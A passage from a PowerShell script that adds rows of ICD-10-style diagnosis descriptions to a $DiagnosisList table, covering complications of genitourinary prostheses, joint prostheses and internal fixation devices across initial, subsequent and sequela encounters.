$DiagnosisList.Rows.Add("Other specified complications due to other genitourinary prosthetic materials","Other specified complications due to other genitourinary prosthetic materials, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified complications due to other genitourinary prosthetic materials","Other specified complications due to other genitourinary prosthetic materials, sequela") + $null = $DiagnosisList.Rows.Add("Embolism due to genitourinary prosthetic devices, implants and grafts","Embolism due to genitourinary prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to genitourinary prosthetic devices, implants and grafts","Embolism due to genitourinary prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to genitourinary prosthetic devices, implants and grafts","Embolism due to genitourinary prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Fibrosis due to genitourinary prosthetic devices, implants and grafts","Fibrosis due to genitourinary prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to genitourinary prosthetic devices, implants and grafts","Fibrosis due to genitourinary prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to genitourinary prosthetic devices, implants and grafts","Fibrosis due to genitourinary prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to genitourinary prosthetic devices, implants and grafts","Hemorrhage due to genitourinary prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to genitourinary prosthetic devices, implants and grafts","Hemorrhage due to genitourinary prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to genitourinary prosthetic devices, implants and grafts","Hemorrhage due to genitourinary prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Pain due to genitourinary prosthetic devices, implants and grafts","Pain due to genitourinary prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Pain due to genitourinary prosthetic devices, implants and grafts","Pain due to genitourinary prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pain due to genitourinary prosthetic devices, implants and grafts","Pain due to genitourinary prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Stenosis due to genitourinary prosthetic devices, implants and grafts","Stenosis due to genitourinary prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Stenosis due to genitourinary prosthetic devices, implants and grafts","Stenosis due to genitourinary prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Stenosis due to genitourinary prosthetic devices, implants and grafts","Stenosis due to genitourinary prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Thrombosis due to genitourinary prosthetic devices, implants and grafts","Thrombosis due to genitourinary prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to genitourinary prosthetic devices, implants and grafts","Thrombosis due to genitourinary prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to genitourinary prosthetic devices, implants and grafts","Thrombosis due to genitourinary prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other specified complication of genitourinary prosthetic devices, implants and grafts","Other specified complication of genitourinary prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of genitourinary prosthetic devices, implants and grafts","Other specified complication of genitourinary prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of genitourinary prosthetic devices, implants and grafts","Other specified complication of genitourinary prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of genitourinary prosthetic device, implant and graft","Unspecified complication of genitourinary prosthetic device, implant and graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of genitourinary prosthetic device, implant and graft","Unspecified complication of genitourinary prosthetic device, implant and graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of genitourinary prosthetic device, implant and graft","Unspecified complication of genitourinary prosthetic device, implant and graft, sequela") + $null = $DiagnosisList.Rows.Add("Broken internal right hip prosthesis","Broken internal right hip prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Broken internal right hip prosthesis","Broken internal right hip prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Broken internal right hip prosthesis","Broken internal right hip prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Broken internal left hip prosthesis","Broken internal left hip prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Broken internal left hip prosthesis","Broken internal left hip prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Broken internal left hip prosthesis","Broken internal left hip prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Broken internal right knee prosthesis","Broken internal right knee prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Broken internal right knee prosthesis","Broken internal right knee prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Broken internal right knee prosthesis","Broken internal right knee prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Broken internal left knee prosthesis","Broken internal left knee prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Broken internal left knee prosthesis","Broken internal left knee prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Broken internal left knee prosthesis","Broken internal left knee prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Broken internal joint prosthesis, other site","Broken internal joint prosthesis, other site, initial encounter") + $null = $DiagnosisList.Rows.Add("Broken internal joint prosthesis, other site","Broken internal joint prosthesis, other site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Broken internal joint prosthesis, other site","Broken internal joint prosthesis, other site, sequela") + $null = $DiagnosisList.Rows.Add("Broken internal joint prosthesis, unspecified site","Broken internal joint prosthesis, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Broken internal joint prosthesis, unspecified site","Broken internal joint prosthesis, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Broken internal joint prosthesis, unspecified site","Broken internal joint prosthesis, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of internal right hip prosthesis","Dislocation of internal right hip prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of internal right hip prosthesis","Dislocation of internal right hip prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of internal right hip prosthesis","Dislocation of internal right hip prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of internal left hip prosthesis","Dislocation of internal left hip prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of internal left hip prosthesis","Dislocation of internal left hip prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of internal left hip prosthesis","Dislocation of internal left hip prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Instability of internal right knee prosthesis","Instability of internal right knee prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Instability of internal right knee prosthesis","Instability of internal right knee prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Instability of internal right knee prosthesis","Instability of internal right knee prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Instability of internal left knee prosthesis","Instability of internal left knee prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Instability of internal left knee prosthesis","Instability of internal left knee prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Instability of internal left knee prosthesis","Instability of internal left knee prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of other internal joint prosthesis","Dislocation of other internal joint prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other internal joint prosthesis","Dislocation of other internal joint prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of other internal joint prosthesis","Dislocation of other internal joint prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified internal joint prosthesis","Dislocation of unspecified internal joint prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified internal joint prosthesis","Dislocation of unspecified internal joint prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified internal joint prosthesis","Dislocation of unspecified internal joint prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal right hip prosthetic joint","Mechanical loosening of internal right hip prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal right hip prosthetic joint","Mechanical loosening of internal right hip prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal right hip prosthetic joint","Mechanical loosening of internal right hip prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal left hip prosthetic joint","Mechanical loosening of internal left hip prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal left hip prosthetic joint","Mechanical loosening of internal left hip prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal left hip prosthetic joint","Mechanical loosening of internal left hip prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal right knee prosthetic joint","Mechanical loosening of internal right knee prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal right knee prosthetic joint","Mechanical loosening of internal right knee prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal right knee prosthetic joint","Mechanical loosening of internal right knee prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal left knee prosthetic joint","Mechanical loosening of internal left knee prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal left knee prosthetic joint","Mechanical loosening of internal left knee prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of internal left knee prosthetic joint","Mechanical loosening of internal left knee prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of other internal prosthetic joint","Mechanical loosening of other internal prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of other internal prosthetic joint","Mechanical loosening of other internal prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of other internal prosthetic joint","Mechanical loosening of other internal prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of unspecified internal prosthetic joint","Mechanical loosening of unspecified internal prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of unspecified internal prosthetic joint","Mechanical loosening of unspecified internal prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Mechanical loosening of unspecified internal prosthetic joint","Mechanical loosening of unspecified internal prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic right hip joint","Periprosthetic osteolysis of internal prosthetic right hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic right hip joint","Periprosthetic osteolysis of internal prosthetic right hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic right hip joint","Periprosthetic osteolysis of internal prosthetic right hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic left hip joint","Periprosthetic osteolysis of internal prosthetic left hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic left hip joint","Periprosthetic osteolysis of internal prosthetic left hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic left hip joint","Periprosthetic osteolysis of internal prosthetic left hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic right knee joint","Periprosthetic osteolysis of internal prosthetic right knee joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic right knee joint","Periprosthetic osteolysis of internal prosthetic right knee joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic right knee joint","Periprosthetic osteolysis of internal prosthetic right knee joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic left knee joint","Periprosthetic osteolysis of internal prosthetic left knee joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic left knee joint","Periprosthetic osteolysis of internal prosthetic left knee joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of internal prosthetic left knee joint","Periprosthetic osteolysis of internal prosthetic left knee joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of other internal prosthetic joint","Periprosthetic osteolysis of other internal prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of other internal prosthetic joint","Periprosthetic osteolysis of other internal prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of other internal prosthetic joint","Periprosthetic osteolysis of other internal prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of unspecified internal prosthetic joint","Periprosthetic osteolysis of unspecified internal prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of unspecified internal prosthetic joint","Periprosthetic osteolysis of unspecified internal prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic osteolysis of unspecified internal prosthetic joint","Periprosthetic osteolysis of unspecified internal prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic right hip joint","Wear of articular bearing surface of internal prosthetic right hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic right hip joint","Wear of articular bearing surface of internal prosthetic right hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic right hip joint","Wear of articular bearing surface of internal prosthetic right hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic left hip joint","Wear of articular bearing surface of internal prosthetic left hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic left hip joint","Wear of articular bearing surface of internal prosthetic left hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic left hip joint","Wear of articular bearing surface of internal prosthetic left hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic right knee joint","Wear of articular bearing surface of internal prosthetic right knee joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic right knee joint","Wear of articular bearing surface of internal prosthetic right knee joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic right knee joint","Wear of articular bearing surface of internal prosthetic right knee joint, sequela") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic left knee joint","Wear of articular bearing surface of internal prosthetic left knee joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic left knee joint","Wear of articular bearing surface of internal prosthetic left knee joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of internal prosthetic left knee joint","Wear of articular bearing surface of internal prosthetic left knee joint, sequela") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of other internal prosthetic joint","Wear of articular bearing surface of other internal prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of other internal prosthetic joint","Wear of articular bearing surface of other internal prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of other internal prosthetic joint","Wear of articular bearing surface of other internal prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of unspecified internal prosthetic joint","Wear of articular bearing surface of unspecified internal prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of unspecified internal prosthetic joint","Wear of articular bearing surface of unspecified internal prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Wear of articular bearing surface of unspecified internal prosthetic joint","Wear of articular bearing surface of unspecified internal prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal right hip prosthesis","Other mechanical complication of internal right hip prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal right hip prosthesis","Other mechanical complication of internal right hip prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal right hip prosthesis","Other mechanical complication of internal right hip prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal left hip prosthesis","Other mechanical complication of internal left hip prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal left hip prosthesis","Other mechanical complication of internal left hip prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal left hip prosthesis","Other mechanical complication of internal left hip prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal right knee prosthesis","Other mechanical complication of internal right knee prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal right knee prosthesis","Other mechanical complication of internal right knee prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal right knee prosthesis","Other mechanical complication of internal right knee prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal left knee prosthesis","Other mechanical complication of internal left knee prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal left knee prosthesis","Other mechanical complication of internal left knee prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal left knee prosthesis","Other mechanical complication of internal left knee prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other internal joint prosthesis","Other mechanical complication of other internal joint prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other internal joint prosthesis","Other mechanical complication of other internal joint prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other internal joint prosthesis","Other mechanical complication of other internal joint prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified internal joint prosthesis","Other mechanical complication of unspecified internal joint prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified internal joint prosthesis","Other mechanical complication of unspecified internal joint prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified internal joint prosthesis","Other mechanical complication of unspecified internal joint prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of right humerus","Breakdown (mechanical) of internal fixation device of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of right humerus","Breakdown (mechanical) of internal fixation device of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of right humerus","Breakdown (mechanical) of internal fixation device of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of left humerus","Breakdown (mechanical) of internal fixation device of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of left humerus","Breakdown (mechanical) of internal fixation device of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of left humerus","Breakdown (mechanical) of internal fixation device of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of right forearm","Breakdown (mechanical) of internal fixation device of bone of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of right forearm","Breakdown (mechanical) of internal fixation device of bone of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of right forearm","Breakdown (mechanical) of internal fixation device of bone of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of left forearm","Breakdown (mechanical) of internal fixation device of bone of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of left forearm","Breakdown (mechanical) of internal fixation device of bone of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of left forearm","Breakdown (mechanical) of internal fixation device of bone of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of right femur","Breakdown (mechanical) of internal fixation device of right femur, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of right femur","Breakdown (mechanical) of internal fixation device of right femur, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of right femur","Breakdown (mechanical) of internal fixation device of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of left femur","Breakdown (mechanical) of internal fixation device of left femur, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of left femur","Breakdown (mechanical) of internal fixation device of left femur, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of left femur","Breakdown (mechanical) of internal fixation device of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of right lower leg","Breakdown (mechanical) of internal fixation device of bone of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of right lower leg","Breakdown (mechanical) of internal fixation device of bone of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of right lower leg","Breakdown (mechanical) of internal fixation device of bone of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of left lower leg","Breakdown (mechanical) of internal fixation device of bone of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of left lower leg","Breakdown (mechanical) of internal fixation device of bone of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bone of left lower leg","Breakdown (mechanical) of internal fixation device of bone of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of unspecified bone of limb","Breakdown (mechanical) of internal fixation device of unspecified bone of limb, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of unspecified bone of limb","Breakdown (mechanical) of internal fixation device of unspecified bone of limb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of unspecified bone of limb","Breakdown (mechanical) of internal fixation device of unspecified bone of limb, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of right humerus","Displacement of internal fixation device of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of right humerus","Displacement of internal fixation device of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of right humerus","Displacement of internal fixation device of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of left humerus","Displacement of internal fixation device of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of left humerus","Displacement of internal fixation device of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of left humerus","Displacement of internal fixation device of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of right forearm","Displacement of internal fixation device of bone of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of right forearm","Displacement of internal fixation device of bone of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of right forearm","Displacement of internal fixation device of bone of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of left forearm","Displacement of internal fixation device of bone of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of left forearm","Displacement of internal fixation device of bone of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of left forearm","Displacement of internal fixation device of bone of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of right femur","Displacement of internal fixation device of right femur, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of right femur","Displacement of internal fixation device of right femur, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of right femur","Displacement of internal fixation device of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of left femur","Displacement of internal fixation device of left femur, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of left femur","Displacement of internal fixation device of left femur, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of left femur","Displacement of internal fixation device of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of right lower leg","Displacement of internal fixation device of bone of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of right lower leg","Displacement of internal fixation device of bone of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of right lower leg","Displacement of internal fixation device of bone of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of left lower leg","Displacement of internal fixation device of bone of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of left lower leg","Displacement of internal fixation device of bone of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bone of left lower leg","Displacement of internal fixation device of bone of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of unspecified bone of limb","Displacement of internal fixation device of unspecified bone of limb, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of unspecified bone of limb","Displacement of internal fixation device of unspecified bone of limb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of unspecified bone of limb","Displacement of internal fixation device of unspecified bone of limb, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of right humerus","Other mechanical complication of internal fixation device of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of right humerus","Other mechanical complication of internal fixation device of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of right humerus","Other mechanical complication of internal fixation device of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of left humerus","Other mechanical complication of internal fixation device of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of left humerus","Other mechanical complication of internal fixation device of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of left humerus","Other mechanical complication of internal fixation device of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of right forearm","Other mechanical complication of internal fixation device of bone of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of right forearm","Other mechanical complication of internal fixation device of bone of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of right forearm","Other mechanical complication of internal fixation device of bone of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of left forearm","Other mechanical complication of internal fixation device of bone of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of left forearm","Other mechanical complication of internal fixation device of bone of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of left forearm","Other mechanical complication of internal fixation device of bone of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of right femur","Other mechanical complication of internal fixation device of right femur, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of right femur","Other mechanical complication of internal fixation device of right femur, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of right femur","Other mechanical complication of internal fixation device of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of left femur","Other mechanical complication of internal fixation device of left femur, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of left femur","Other mechanical complication of internal fixation device of left femur, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of left femur","Other mechanical complication of internal fixation device of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of right lower leg","Other mechanical complication of internal fixation device of bone of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of right lower leg","Other mechanical complication of internal fixation device of bone of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of right lower leg","Other mechanical complication of internal fixation device of bone of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of left lower leg","Other mechanical complication of internal fixation device of bone of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of left lower leg","Other mechanical complication of internal fixation device of bone of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bone of left lower leg","Other mechanical complication of internal fixation device of bone of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of unspecified bone of limb","Other mechanical complication of internal fixation device of unspecified bone of limb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal 